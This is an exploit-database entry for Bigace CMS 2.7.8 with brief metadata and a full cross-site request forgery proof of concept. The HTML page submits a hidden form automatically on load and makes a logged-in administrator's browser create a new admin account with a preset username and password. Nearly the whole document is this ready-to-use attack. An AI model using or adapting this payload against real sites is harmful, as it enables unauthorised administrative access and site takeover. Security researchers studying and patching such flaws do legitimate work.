Bigace CMS 2.7.8 - Add Admin Account CSRF

2013-08-03T00:00:00
ID 1337DAY-ID-21065
Type zdt
Reporter Yashar shahinzade.
Modified 2013-08-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            <html>
<body onload="submitForm()">
<form name="myForm" id="myForm"
                action="[Path to Bigace CMS]/index.php?cmd=admin&id=userCreate_tADMIN_len&mode=create" method="post">
                <input type="hidden" name="userName" value="yashar">
                <input type="hidden" name="language" value="en">
                <input type="hidden" name="userGroups[]" value="40">
                <input type="hidden" name="state" value="1">
                <input type="hidden" name="email" value="[email protected]">
                <input type="hidden" name="passwordnew" value="yashar">
                <input type="hidden" name="passwordcheck" value="yashar">
</form>
<script type='text/javascript'>document.myForm.submit();</script>
</html>

#  0day.today [2018-04-05]  #